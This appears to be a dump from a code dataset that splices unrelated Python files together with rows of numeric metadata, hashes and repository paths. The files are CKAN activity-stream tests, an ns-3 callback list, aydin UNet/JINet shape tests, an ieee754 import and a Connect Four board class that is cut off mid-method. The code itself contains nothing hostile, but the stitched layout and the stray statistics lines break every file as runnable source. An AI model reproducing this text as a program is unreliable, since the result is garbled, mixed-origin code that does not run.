    def test_redirect_also_with_activity_parameter(self, app):
        """package_history redirects id -> name, keeping activity_id."""
        user = factories.User()
        dataset = factories.Dataset(user=user)
        activity = activity_model.package_activity_list(
            dataset["id"], limit=1, offset=0
        )[0]
        # view as an admin because viewing the old versions of a dataset
        sysadmin = factories.Sysadmin()
        env = {"REMOTE_USER": sysadmin["name"]}
        response = app.get(
            url_for(
                "activity.package_history",
                id=dataset["id"],
                activity_id=activity.id,
            ),
            status=302,
            extra_environ=env,
            follow_redirects=False,
        )
        expected_path = url_for(
            "activity.package_history",
            id=dataset["name"],
            _external=True,
            activity_id=activity.id,
        )
        assert response.headers["location"] == expected_path

    def test_read_dataset_as_it_used_to_be(self, app):
        """package_history renders the dataset state at the activity time."""
        dataset = factories.Dataset(title="Original title")
        activity = (
            model.Session.query(Activity)
            .filter_by(object_id=dataset["id"])
            .one()
        )
        dataset["title"] = "Changed title"
        helpers.call_action("package_update", **dataset)
        sysadmin = factories.Sysadmin()
        env = {"REMOTE_USER": sysadmin["name"]}
        response = app.get(
            url_for(
                "activity.package_history",
                id=dataset["name"],
                activity_id=activity.id,
            ),
            extra_environ=env,
        )
        assert helpers.body_contains(response, "Original title")

    def test_read_dataset_as_it_used_to_be_but_is_unmigrated(self, app):
        # Renders the dataset using the activity detail, when that Activity was
        # created with an earlier version of CKAN, and it has not been migrated
        # (with migrate_package_activity.py), which should give a 404
        user = factories.User()
        dataset = factories.Dataset(user=user)
        # delete the modern Activity object that's been automatically created
        modern_activity = (
            model.Session.query(Activity)
            .filter_by(object_id=dataset["id"])
            .one()
        )
        modern_activity.delete()
        # Create an Activity object as it was in earlier versions of CKAN.
        # This code is based on:
        # https://github.com/ckan/ckan/blob/b348bf2fe68db6704ea0a3e22d533ded3d8d4344/ckan/model/package.py#L508
        activity_type = "changed"
        dataset_table_dict = dictization.table_dictize(
            model.Package.get(dataset["id"]), context={"model": model}
        )
        activity = Activity(
            user_id=user["id"],
            object_id=dataset["id"],
            activity_type="%s package" % activity_type,
            data={
                # "actor": a legacy activity had no "actor"
                # "package": a legacy activity had just the package table,
                # rather than the result of package_show
                "package": dataset_table_dict
            },
        )
        model.Session.add(activity)
        sysadmin = factories.Sysadmin()
        env = {"REMOTE_USER": sysadmin["name"]}
        app.get(
            url_for(
                "activity.package_history",
                id=dataset["name"],
                activity_id=activity.id,
            ),
            extra_environ=env,
            status=404,
        )

    def test_changes(self, app):
        """The changes page shows both old and new titles."""
        user = factories.User()
        dataset = factories.Dataset(title="First title", user=user)
        dataset["title"] = "Second title"
        helpers.call_action("package_update", **dataset)
        activity = activity_model.package_activity_list(
            dataset["id"], limit=1, offset=0
        )[0]
        env = {"REMOTE_USER": user["name"]}
        response = app.get(
            url_for("activity.package_changes", id=activity.id),
            extra_environ=env,
        )
        assert helpers.body_contains(response, "First")
        assert helpers.body_contains(response, "Second")

    @pytest.mark.ckan_config("ckan.activity_list_limit", "3")
    def test_invalid_get_params(self, app):
        """A non-timestamp 'before' parameter is rejected with 400."""
        user = factories.User()
        dataset = factories.Dataset(user=user)
        url = url_for("activity.package_activity", id=dataset["id"])
        response = app.get(url, query_string={"before": "XXX"}, status=400)
        assert "Invalid parameters" in response.body

    @pytest.mark.ckan_config("ckan.activity_list_limit", "3")
    def test_next_page_button(self, app):
        """With 4 activities and a page limit of 3, page 1 has a 'next'
        link (before=<last shown timestamp>) but no 'previous' link."""
        user = factories.User()
        dataset = factories.Dataset(user=user)
        dataset["title"] = "Second title"
        helpers.call_action("package_update", **dataset)
        dataset["title"] = "Third title"
        helpers.call_action("package_update", **dataset)
        dataset["title"] = "Fourth title"
        helpers.call_action("package_update", **dataset)
        url = url_for("activity.package_activity", id=dataset["id"])
        response = app.get(url)
        activities = helpers.call_action(
            "package_activity_list", id=dataset["id"]
        )
        # Last activity in the first page
        before_time = datetime.fromisoformat(activities[2]["timestamp"])
        # Next page button
        next_page_url = "/dataset/activity/{}?before={}".format(
            dataset["id"], before_time.timestamp()
        )
        assert next_page_url in response.body
        # Prev page button is not in the first page
        prev_page_url = "/dataset/activity/{}?after=".format(dataset["id"])
        assert prev_page_url not in response.body

    @pytest.mark.ckan_config("ckan.activity_list_limit", "3")
    def test_next_before_buttons(self, app):
        """A middle page (page 2 of 3) has both next and previous links
        keyed on the neighbouring activities' timestamps."""
        user = factories.User()
        dataset = factories.Dataset(user=user)
        dataset["title"] = "Second title"
        helpers.call_action("package_update", **dataset)
        dataset["title"] = "Third title"
        helpers.call_action("package_update", **dataset)
        dataset["title"] = "4th title"
        helpers.call_action("package_update", **dataset)
        dataset["title"] = "5th title"
        helpers.call_action("package_update", **dataset)
        dataset["title"] = "6th title"
        helpers.call_action("package_update", **dataset)
        dataset["title"] = "7h title"
        helpers.call_action("package_update", **dataset)
        db_activities = activity_model.package_activity_list(
            dataset["id"], limit=10
        )
        activities = helpers.call_action(
            "package_activity_list", id=dataset["id"]
        )
        # Last activity in the first page
        last_act_page_1_time = datetime.fromisoformat(
            activities[2]["timestamp"]
        )
        url = url_for("activity.package_activity", id=dataset["id"])
        response = app.get(
            url, query_string={"before": last_act_page_1_time.timestamp()}
        )
        # Next page button exists in page 2
        next_page_url = "/dataset/activity/{}?before={}".format(
            dataset["id"], db_activities[5].timestamp.timestamp()
        )
        assert next_page_url in response.body
        # Prev page button exists in page 2
        prev_page_url = "/dataset/activity/{}?after={}".format(
            dataset["id"], db_activities[3].timestamp.timestamp()
        )
        assert prev_page_url in response.body

    @pytest.mark.ckan_config("ckan.activity_list_limit", "3")
    def test_prev_page_button(self, app):
        """The last page has a 'previous' link but no 'next' link."""
        user = factories.User()
        dataset = factories.Dataset(user=user)
        dataset["title"] = "Second title"
        helpers.call_action("package_update", **dataset)
        dataset["title"] = "Third title"
        helpers.call_action("package_update", **dataset)
        dataset["title"] = "Fourth title"
        helpers.call_action("package_update", **dataset)
        activities = helpers.call_action(
            "package_activity_list", id=dataset["id"], limit=10
        )
        before_time = datetime.fromisoformat(activities[2]["timestamp"])
        url = url_for("activity.package_activity", id=dataset["id"])
        # url for page 2
        response = app.get(
            url, query_string={"before": before_time.timestamp()}
        )
        # There's not a third page
        # NOTE(review): this uses dataset["name"] while sibling assertions
        # use dataset["id"] — a mismatched value would make this negative
        # assertion pass vacuously; verify which key the URL really uses.
        next_page_url = "/dataset/activity/{}?before=".format(dataset["name"])
        assert next_page_url not in response.body
        # previous page exists
        after_time = datetime.fromisoformat(activities[3]["timestamp"])
        prev_page_url = "/dataset/activity/{}?after={}".format(
            dataset["id"], after_time.timestamp()
        )
        assert prev_page_url in response.body
@pytest.mark.ckan_config("ckan.plugins", "activity")
@pytest.mark.usefixtures("non_clean_db", "with_plugins")
class TestGroup:
    """Rendering tests for the group activity-stream page: create, update,
    delete (both flavours), and dataset activities within a group."""

    def test_simple(self, app):
        """Checking the template shows the activity stream."""
        user = factories.User()
        group = factories.Group(user=user)
        url = url_for("activity.group_activity", id=group["id"])
        response = app.get(url)
        assert user["fullname"] in response
        assert "created the group" in response

    def test_create_group(self, app):
        """Group creation renders actor link, verb, and group link."""
        user = factories.User()
        group = factories.Group(user=user)
        url = url_for("activity.group_activity", id=group["id"])
        response = app.get(url)
        assert (
            '<a href="/user/{}">{}'.format(user["name"], user["fullname"])
            in response
        )
        assert "created the group" in response
        assert (
            '<a href="/group/{}">{}'.format(group["name"], group["title"])
            in response
        )

    def test_change_group(self, app):
        """A title change renders an 'updated the group' entry."""
        user = factories.User()
        group = factories.Group(user=user)
        _clear_activities()
        group["title"] = "Group with changed title"
        helpers.call_action(
            "group_update", context={"user": user["name"]}, **group
        )
        url = url_for("activity.group_activity", id=group["id"])
        response = app.get(url)
        assert (
            '<a href="/user/{}">{}'.format(user["name"], user["fullname"])
            in response
        )
        assert "updated the group" in response
        assert (
            '<a href="/group/{}">{}'.format(group["name"], group["title"])
            in response
        )

    def test_delete_group_using_group_delete(self, app):
        """After group_delete, even the owner gets 404 on the group's
        activity page (see comment below for why)."""
        user = factories.User()
        group = factories.Group(user=user)
        _clear_activities()
        helpers.call_action(
            "group_delete", context={"user": user["name"]}, **group
        )
        url = url_for("activity.group_activity", id=group["id"])
        env = {"REMOTE_USER": user["name"]}
        app.get(url, extra_environ=env, status=404)
        # group_delete causes the Member to state=deleted and then the user
        # doesn't have permission to see their own deleted Group. Therefore you
        # can't render the activity stream of that group. You'd hope that
        # group_delete was the same as group_update state=deleted but they are
        # not...

    def test_delete_group_by_updating_state(self, app):
        """Soft-deleting via group_update state='deleted' still lets the
        owner view the stream, which shows 'deleted the group'."""
        user = factories.User()
        group = factories.Group(user=user)
        _clear_activities()
        group["state"] = "deleted"
        helpers.call_action(
            "group_update", context={"user": user["name"]}, **group
        )
        url = url_for("activity.group_activity", id=group["id"])
        env = {"REMOTE_USER": user["name"]}
        response = app.get(url, extra_environ=env)
        assert (
            '<a href="/user/{}">{}'.format(user["name"], user["fullname"])
            in response
        )
        assert "deleted the group" in response
        assert (
            '<a href="/group/{}">{}'.format(group["name"], group["title"])
            in response
        )

    def test_create_dataset(self, app):
        """Creating a dataset in the group shows on the group's stream."""
        user = factories.User()
        group = factories.Group(user=user)
        _clear_activities()
        dataset = factories.Dataset(groups=[{"id": group["id"]}], user=user)
        url = url_for("activity.group_activity", id=group["id"])
        response = app.get(url)
        page = BeautifulSoup(response.body)
        href = page.select_one(".dataset")
        assert (
            '<a href="/user/{}">{}'.format(user["name"], user["fullname"])
            in response
        )
        assert "created the dataset" in response
        # The dataset link's URL path ends with the dataset id.
        assert dataset["id"] in href.select_one("a")["href"].split("/", 2)[-1]
        assert dataset["title"] in href.text.strip()

    def test_change_dataset(self, app):
        """Updating a member dataset shows on the group's stream."""
        user = factories.User()
        group = factories.Group(user=user)
        dataset = factories.Dataset(groups=[{"id": group["id"]}], user=user)
        _clear_activities()
        dataset["title"] = "Dataset with changed title"
        helpers.call_action(
            "package_update", context={"user": user["name"]}, **dataset
        )
        url = url_for("activity.group_activity", id=group["id"])
        response = app.get(url)
        page = BeautifulSoup(response.body)
        href = page.select_one(".dataset")
        assert (
            '<a href="/user/{}">{}'.format(user["name"], user["fullname"])
            in response
        )
        assert "updated the dataset" in response
        assert dataset["id"] in href.select_one("a")["href"].split("/", 2)[-1]
        assert dataset["title"] in href.text.strip()

    def test_delete_dataset(self, app):
        """Deleting a member dataset shows on the group's stream."""
        user = factories.User()
        group = factories.Group(user=user)
        dataset = factories.Dataset(groups=[{"id": group["id"]}], user=user)
        _clear_activities()
        helpers.call_action(
            "package_delete", context={"user": user["name"]}, **dataset
        )
        url = url_for("activity.group_activity", id=group["id"])
        response = app.get(url)
        page = BeautifulSoup(response.body)
        href = page.select_one(".dataset")
        assert (
            '<a href="/user/{}">{}'.format(user["name"], user["fullname"])
            in response
        )
        assert "deleted the dataset" in response
        assert dataset["id"] in href.select_one("a")["href"].split("/", 2)[-1]
        assert dataset["title"] in href.text.strip()
| 36.191107
| 146
| 0.583991
| 4,306
| 38,254
| 5.046679
| 0.065722
| 0.039575
| 0.044177
| 0.035203
| 0.859555
| 0.841793
| 0.83443
| 0.820487
| 0.799273
| 0.771064
| 0
| 0.005509
| 0.274037
| 38,254
| 1,056
| 147
| 36.225379
| 0.776998
| 0.060438
| 0
| 0.740957
| 0
| 0
| 0.176112
| 0.050146
| 0
| 0
| 0
| 0
| 0.157526
| 1
| 0.057176
| false
| 0
| 0.011669
| 0
| 0.073512
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
941c220f14cc4e46420d6820a5146f5600ad42e2
| 176
|
py
|
Python
|
ns-allinone-3.27/ns-3.27/src/config-store/bindings/callbacks_list.py
|
zack-braun/4607_NS
|
43c8fb772e5552fb44bd7cd34173e73e3fb66537
|
[
"MIT"
] | 93
|
2019-04-21T08:22:26.000Z
|
2022-03-30T04:26:29.000Z
|
ns-allinone-3.27/ns-3.27/src/config-store/bindings/callbacks_list.py
|
zack-braun/4607_NS
|
43c8fb772e5552fb44bd7cd34173e73e3fb66537
|
[
"MIT"
] | 12
|
2019-04-19T16:39:58.000Z
|
2021-06-22T13:18:32.000Z
|
ns-allinone-3.27/ns-3.27/src/config-store/bindings/callbacks_list.py
|
zack-braun/4607_NS
|
43c8fb772e5552fb44bd7cd34173e73e3fb66537
|
[
"MIT"
] | 21
|
2019-05-27T19:36:12.000Z
|
2021-07-26T02:37:41.000Z
|
# ns-3 bindings helper data: each entry lists the template argument types of
# one callback instantiation (return type followed by nine parameter slots,
# unused slots filled with 'ns3::empty').
callback_classes = [
    ['ns3::ObjectBase *'] + ['ns3::empty'] * 9,
]
| 44
| 152
| 0.573864
| 22
| 176
| 4.545455
| 0.227273
| 0.72
| 0.88
| 1.28
| 0.72
| 0.72
| 0.72
| 0.72
| 0.72
| 0.72
| 0
| 0.063694
| 0.107955
| 176
| 3
| 153
| 58.666667
| 0.573248
| 0
| 0
| 0
| 0
| 0
| 0.607955
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
948948f20d45fbd31116314e59738d8968477193
| 3,738
|
py
|
Python
|
aydin/nn/models/test/test_models.py
|
royerloic/aydin
|
f9c61a24030891d008c318b250da5faec69fcd7d
|
[
"BSD-3-Clause"
] | 78
|
2021-11-08T16:11:23.000Z
|
2022-03-27T17:51:04.000Z
|
aydin/nn/models/test/test_models.py
|
royerloic/aydin
|
f9c61a24030891d008c318b250da5faec69fcd7d
|
[
"BSD-3-Clause"
] | 19
|
2021-11-08T17:15:40.000Z
|
2022-03-30T17:46:55.000Z
|
aydin/nn/models/test/test_models.py
|
royerloic/aydin
|
f9c61a24030891d008c318b250da5faec69fcd7d
|
[
"BSD-3-Clause"
] | 7
|
2021-11-09T17:42:32.000Z
|
2022-03-09T00:37:57.000Z
|
import numpy as np
from aydin.nn.models.jinet import JINetModel
from aydin.nn.models.unet import UNetModel
def test_supervised_2D():
    """Supervised 2D UNet prediction preserves input shape and dtype."""
    x = np.zeros((1, 64, 64, 1), dtype=np.float32)
    model = UNetModel(
        (64, 64, 1),
        nb_unet_levels=2,
        shiftconv=False,
        supervised=True,
        spacetime_ndim=2,
    )
    y = model.predict(x)
    assert (y.shape, y.dtype) == (x.shape, x.dtype)
def test_shiftconv_2D():
    """Shift-convolution 2D UNet prediction preserves shape and dtype."""
    x = np.zeros((1, 64, 64, 1), dtype=np.float32)
    model = UNetModel(
        (64, 64, 1),
        nb_unet_levels=2,
        shiftconv=True,
        supervised=False,
        spacetime_ndim=2,
    )
    y = model.predict(x)
    assert (y.shape, y.dtype) == (x.shape, x.dtype)
def test_masking_2D():
    """Masking 2D UNet (predict takes [input, mask]) preserves shape/dtype."""
    x = np.zeros((1, 64, 64, 1), dtype=np.float32)
    model = UNetModel(
        (64, 64, 1),
        nb_unet_levels=2,
        shiftconv=False,
        supervised=False,
        spacetime_ndim=2,
    )
    y = model.predict([x, x])
    assert (y.shape, y.dtype) == (x.shape, x.dtype)
def test_jinet_2D():
    """2D JINet prediction preserves input shape and dtype."""
    x = np.zeros((1, 64, 64, 1), dtype=np.float32)
    model = JINetModel((64, 64, 1), spacetime_ndim=2)
    y = model.predict([x])
    assert (y.shape, y.dtype) == (x.shape, x.dtype)
def test_supervised_3D():
    """Supervised 3D UNet prediction preserves input shape and dtype."""
    x = np.zeros((1, 64, 64, 64, 1), dtype=np.float32)
    model = UNetModel(
        (64, 64, 64, 1),
        nb_unet_levels=2,
        shiftconv=False,
        supervised=True,
        spacetime_ndim=3,
    )
    y = model.predict(x)
    assert (y.shape, y.dtype) == (x.shape, x.dtype)
def test_shiftconv_3D():
    """Shift-convolution 3D UNet prediction preserves shape and dtype."""
    x = np.zeros((1, 64, 64, 64, 1), dtype=np.float32)
    model = UNetModel(
        (64, 64, 64, 1),
        nb_unet_levels=2,
        shiftconv=True,
        supervised=False,
        spacetime_ndim=3,
    )
    y = model.predict(x)
    assert (y.shape, y.dtype) == (x.shape, x.dtype)
def test_masking_3D():
    """Masking 3D UNet (predict takes [input, mask]) preserves shape/dtype."""
    x = np.zeros((1, 64, 64, 64, 1), dtype=np.float32)
    model = UNetModel(
        (64, 64, 64, 1),
        nb_unet_levels=2,
        shiftconv=False,
        supervised=False,
        spacetime_ndim=3,
    )
    y = model.predict([x, x])
    assert (y.shape, y.dtype) == (x.shape, x.dtype)
def test_various_masking_3D():
    """Masking 3D UNet handles a couple of different depth sizes."""
    for extra in (0, 4):
        x = np.zeros((1, 21 + extra, 64, 64, 1), dtype=np.float32)
        print(f'input shape: {x.shape}')
        model = UNetModel(
            x.shape[1:],
            nb_unet_levels=4,
            shiftconv=False,
            supervised=False,
            spacetime_ndim=3,
        )
        y = model.predict([x, x])
        assert (y.shape, y.dtype) == (x.shape, x.dtype)
def test_thin_masking_3D():
    """Masking 3D UNet handles very thin stacks (depths 2, 3, 4)."""
    for extra in (0, 1, 2):
        x = np.zeros((1, 2 + extra, 64, 64, 1), dtype=np.float32)
        print(f'input shape: {x.shape}')
        model = UNetModel(
            x.shape[1:],
            nb_unet_levels=4,
            shiftconv=False,
            supervised=False,
            spacetime_ndim=3,
        )
        y = model.predict([x, x])
        assert (y.shape, y.dtype) == (x.shape, x.dtype)
| 28.976744
| 72
| 0.62306
| 488
| 3,738
| 4.590164
| 0.104508
| 0.196429
| 0.035714
| 0.098214
| 0.929464
| 0.9
| 0.9
| 0.9
| 0.9
| 0.9
| 0
| 0.061912
| 0.261102
| 3,738
| 128
| 73
| 29.203125
| 0.749095
| 0
| 0
| 0.752294
| 0
| 0
| 0.017121
| 0
| 0
| 0
| 0
| 0
| 0.165138
| 1
| 0.082569
| false
| 0
| 0.027523
| 0
| 0.110092
| 0.018349
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
84a6d27e19583749b2f3ac515409612cdffa0a49
| 35
|
py
|
Python
|
ieee754/__init__.py
|
canbula/ieee754
|
3311c8a8a44a521addbcd0c1cc39432edb2e94e5
|
[
"MIT"
] | 2
|
2022-01-08T16:28:12.000Z
|
2022-01-08T20:57:48.000Z
|
ieee754/__init__.py
|
canbula/ieee754
|
3311c8a8a44a521addbcd0c1cc39432edb2e94e5
|
[
"MIT"
] | null | null | null |
ieee754/__init__.py
|
canbula/ieee754
|
3311c8a8a44a521addbcd0c1cc39432edb2e94e5
|
[
"MIT"
] | null | null | null |
from ieee754.IEEE754 import IEEE754
| 35
| 35
| 0.885714
| 5
| 35
| 6.2
| 0.6
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.28125
| 0.085714
| 35
| 1
| 35
| 35
| 0.6875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
84a99d1371d9695c1dd8444857c85c72a14c0223
| 41,094
|
py
|
Python
|
model.py
|
LovroPridigar/Vislice
|
6e3e01b95cc15755ac1365a084c0743f6df1571d
|
[
"MIT"
] | null | null | null |
model.py
|
LovroPridigar/Vislice
|
6e3e01b95cc15755ac1365a084c0743f6df1571d
|
[
"MIT"
] | null | null | null |
model.py
|
LovroPridigar/Vislice
|
6e3e01b95cc15755ac1365a084c0743f6df1571d
|
[
"MIT"
] | null | null | null |
import random
import time
SIRINA = 7  # board width: number of columns ("sirina" = width)
VISINA = 6  # board height: number of rows ("visina" = height)
def nova_igra():
    """Start a new game.

    Returns a ``Polje`` wrapping a fresh VISINA x SIRINA grid in which every
    cell is the single-space string ``" "`` (the empty-cell marker used
    throughout the board code).
    """
    # A nested comprehension replaces the original append loops; each row is
    # built independently so rows never share list identity.
    return Polje([[" " for _ in range(SIRINA)] for _ in range(VISINA)])
class Polje:
def __init__(self, polje):
self.polje = polje[:]
self.meti = []
self.score1 = 0
self.score2 = 0
def pravilnost(self, izbira):
if self.polje[VISINA - 1][izbira] == " ":
return True
else:
return False
def dodaj_kovanec_X(self, izbira):
self.meti.append(izbira)
if self.pravilnost(izbira) == True:
for i in range(VISINA):
if self.polje[i][izbira] == " ":
self.polje[i].pop(izbira)
self.polje[i].insert(izbira, "X")
break
def dodaj_kovanec_O(self, izbira):
self.meti.append(izbira)
if self.pravilnost(izbira) == True:
for i in range(VISINA):
if self.polje[i][izbira] == " ":
self.polje[i].pop(izbira)
self.polje[i].insert(izbira, "O")
break
def get_visina(self, izbira):
visina = 0
for i in range(VISINA):
if self.polje[i][izbira] == " ":
visina += 1
return 6 - visina
def odstrani_kovanec(self, izbira):
stevilo = 0
for i in range(VISINA):
if self.polje[i][izbira] == " ":
stevilo += 1
if stevilo != 6:
self.polje[5 - stevilo].pop(izbira)
self.polje[5 - stevilo].insert(izbira, " ")
def seznam_pravilnih(self):
seznam = []
for i in range(SIRINA):
if self.polje[VISINA - 1][i] == " ":
seznam.append(i)
return seznam
def sprintaj(self):
polje = []
for i in range(len(self.polje)):
polje.append("│ " + " │ ".join(str(v) for v in self.polje[i]) + " │")
polje.insert(0, "│ 0 │ 1 │ 2 │ 3 │ 4 │ 5 │ 6 │")
polje.insert(1, "=============================")
novo_polje = []
for i in range(len(polje)):
novo_polje.append(polje[-i-1])
print(*novo_polje, sep = "\n")
def animacija(self, izbira):
if self.zmaga() == True:
if self.get_visina(izbira) <= 4:
time.sleep(1.6)
self.odstrani_kovanec(izbira)
for i in range(1, 6 - self.get_visina(izbira)):
self.polje[-i][izbira] = "o"
print("_____________________________")
self.sprintaj()
time.sleep(1.1)
self.polje[-i][izbira] = " "
self.dodaj_kovanec_O(izbira)
def remi(self):
if self.seznam_pravilnih() == [] and self.zmaga() == False:
return True
else:
return False
def stevilo_kovancev(self):
stevilo = 0
for vrstica in self.polje:
for element in vrstica:
if element == "X" or element == "O":
stevilo += 1
return stevilo
def kdo_je_zmagal(self):
if self.remi() == True:
return "Igra je neodločena!"
if True:
if self.stevilo_kovancev() % 2 == 1:
return "Zmagal je Igralec 1 !"
else:
return "Zmagal je Igralec 2 !"
def kdo_je_zmagal_robot(self):
if self.stevilo_kovancev() % 2 == 1:
return "Igralec 1"
else:
return "ROBOT"
def sprazni_polje(self):
    """Reset every cell of the board to " " and return the board."""
    for vrstica in self.polje:
        # Slice assignment mutates the existing row list in place,
        # exactly like the original per-index pop + insert loop.
        vrstica[:] = [" "] * len(vrstica)
    return self.polje
def kdo_je_na_vrsti(self):
    """Return whose turn it is: player 1 moves on even coin counts."""
    return "Igralec 1" if self.stevilo_kovancev() % 2 == 0 else "Igralec 2"
def shiny(self):
    """After a win, lowercase every four-in-a-row so it stands out in print.

    "O" runs become "o" and "X" runs become "x".  Scans run in the same
    order as the original eight copy-pasted loops: for each symbol,
    horizontal, vertical, down-right diagonal, then up-right diagonal,
    marking matches immediately (so a cell already re-marked by an earlier
    direction no longer matches later ones, as before).

    Bug fix: the up-right diagonal scans used range(3, 5) and therefore
    never examined windows starting on row 5; range(3, 6) covers them.
    """
    if self.zmaga() != True:
        return
    for znak, nova in (("O", "o"), ("X", "x")):
        self._oznaci_stirke(znak, nova)

def _oznaci_stirke(self, znak, nova):
    """Replace every four-in-a-row of *znak* with *nova*, one direction at a time."""
    # (start rows, start cols, row step, col step) for the four directions.
    smeri = (
        (range(6), range(4), 0, 1),      # horizontal
        (range(3), range(7), 1, 0),      # vertical
        (range(3), range(4), 1, 1),      # diagonal down-right
        (range(3, 6), range(4), -1, 1),  # diagonal up-right (was range(3, 5))
    )
    for vrstice, stolpci, di, dj in smeri:
        for i in vrstice:
            for j in stolpci:
                if all(self.polje[i + k * di][j + k * dj] == znak for k in range(4)):
                    for k in range(4):
                        self.polje[i + k * di][j + k * dj] = nova
######################################################################################################################################################################
def vodoravno_4(self):
    """Return True when some row holds four identical coins ("O" or "X") in a row."""
    for vrstica in self.polje[:6]:
        for j in range(4):
            okno = vrstica[j:j + 4]
            if okno == ["O"] * 4 or okno == ["X"] * 4:
                return True

def navpicno_4(self):
    """Return True when some column holds four identical coins stacked up."""
    for i in range(3):
        for j in range(7):
            okno = [self.polje[i + k][j] for k in range(4)]
            if okno == ["O"] * 4 or okno == ["X"] * 4:
                return True

def posevno_4(self):
    """Return True when a down-right diagonal holds four identical coins."""
    for i in range(3):
        for j in range(4):
            okno = [self.polje[i + k][j + k] for k in range(4)]
            if okno == ["O"] * 4 or okno == ["X"] * 4:
                return True
def posevno2_4(self):
    """Return True when an up-right diagonal holds four identical coins.

    A window starts at (i, j) and climbs through (i-1, j+1) .. (i-3, j+3),
    so valid start rows are i in 3..5.  The original looped over
    range(3, 5) and never examined i == 5, missing every four-in-a-row
    whose start cell lies on row 5.
    """
    for i in range(3, 6):  # was range(3, 5): skipped row-5 starts
        for j in range(4):
            okno = [self.polje[i - k][j + k] for k in range(4)]
            if okno == ["O"] * 4 or okno == ["X"] * 4:
                return True
def zmaga(self):
    """Return True when any direction currently contains a four-in-a-row.

    The original spelled the condition `a or b or c or d() == True`; due to
    operator precedence the `== True` bound only to the last call.  bool()
    keeps the explicit True/False return while making the intent clear.
    """
    return bool(self.vodoravno_4() or self.navpicno_4() or
                self.posevno_4() or self.posevno2_4())
def st_zmag(self):
    """Return 1 when the position contains any four-in-a-row, else 0.

    Despite the name ("number of wins"), this is a 0/1 indicator used as a
    score increment by the robot.  The misleading `... or x() == True`
    precedence of the original is removed; behavior is unchanged.
    """
    if self.vodoravno_4() or self.navpicno_4() or self.posevno_4() or self.posevno2_4():
        return 1
    return 0
def zmaga_brez_navp(self):
    """Like zmaga(), but ignores vertical four-in-a-rows."""
    if self.vodoravno_4():
        return True
    if self.posevno_4():
        return True
    # Preserves the original's `== True` on the final term only.
    return self.posevno2_4() == True
def vodoravno_4_o(self):
    """Return True when some row holds four highlighted "o" cells in a row."""
    for i in range(6):
        for j in range(4):
            if self.polje[i][j:j + 4] == ["o"] * 4:
                return True

def navpicno_4_o(self):
    """Return True when some column holds four highlighted "o" cells."""
    for i in range(3):
        for j in range(7):
            if [self.polje[i + k][j] for k in range(4)] == ["o"] * 4:
                return True

def posevno_4_o(self):
    """Return True when a down-right diagonal holds four "o" cells."""
    for i in range(3):
        for j in range(4):
            if [self.polje[i + k][j + k] for k in range(4)] == ["o"] * 4:
                return True

def posevno2_4_o(self):
    """Return True when an up-right diagonal holds four "o" cells.

    range(3, 6) fixes the original range(3, 5), which skipped windows
    starting on row 5.
    """
    for i in range(3, 6):
        for j in range(4):
            if [self.polje[i - k][j + k] for k in range(4)] == ["o"] * 4:
                return True

def zmaga_o(self):
    """Return True when any highlighted ("o") four-in-a-row exists.

    bool() replaces the original trailing `== True`, which bound only to
    the last call of the or-chain.
    """
    return bool(self.vodoravno_4_o() or self.navpicno_4_o() or
                self.posevno_4_o() or self.posevno2_4_o())
def vodoravno_4_x(self):
    """Return True when some row holds four highlighted "x" cells in a row."""
    for i in range(6):
        for j in range(4):
            if self.polje[i][j:j + 4] == ["x"] * 4:
                return True

def navpicno_4_x(self):
    """Return True when some column holds four highlighted "x" cells."""
    for i in range(3):
        for j in range(7):
            if [self.polje[i + k][j] for k in range(4)] == ["x"] * 4:
                return True

def posevno_4_x(self):
    """Return True when a down-right diagonal holds four "x" cells."""
    for i in range(3):
        for j in range(4):
            if [self.polje[i + k][j + k] for k in range(4)] == ["x"] * 4:
                return True

def posevno2_4_x(self):
    """Return True when an up-right diagonal holds four "x" cells.

    range(3, 6) fixes the original range(3, 5), which skipped windows
    starting on row 5.
    """
    for i in range(3, 6):
        for j in range(4):
            if [self.polje[i - k][j + k] for k in range(4)] == ["x"] * 4:
                return True

def zmaga_x(self):
    """Return True when any highlighted ("x") four-in-a-row exists.

    bool() replaces the original trailing `== True`, which bound only to
    the last call of the or-chain.
    """
    return bool(self.vodoravno_4_x() or self.navpicno_4_x() or
                self.posevno_4_x() or self.posevno2_4_x())
######################################################################################################################################################################
def vodoravno_4_0(self):
    """Return True when some row holds four "O" coins in a row."""
    for i in range(6):
        for j in range(4):
            if self.polje[i][j:j + 4] == ["O"] * 4:
                return True

def navpicno_4_0(self):
    """Return True when some column holds four "O" coins stacked up."""
    for i in range(3):
        for j in range(7):
            if [self.polje[i + k][j] for k in range(4)] == ["O"] * 4:
                return True

def posevno_4_0(self):
    """Return True when a down-right diagonal holds four "O" coins."""
    for i in range(3):
        for j in range(4):
            if [self.polje[i + k][j + k] for k in range(4)] == ["O"] * 4:
                return True

def posevno2_4_0(self):
    """Return True when an up-right diagonal holds four "O" coins.

    range(3, 6) fixes the original range(3, 5), which skipped windows
    starting on row 5.
    """
    for i in range(3, 6):
        for j in range(4):
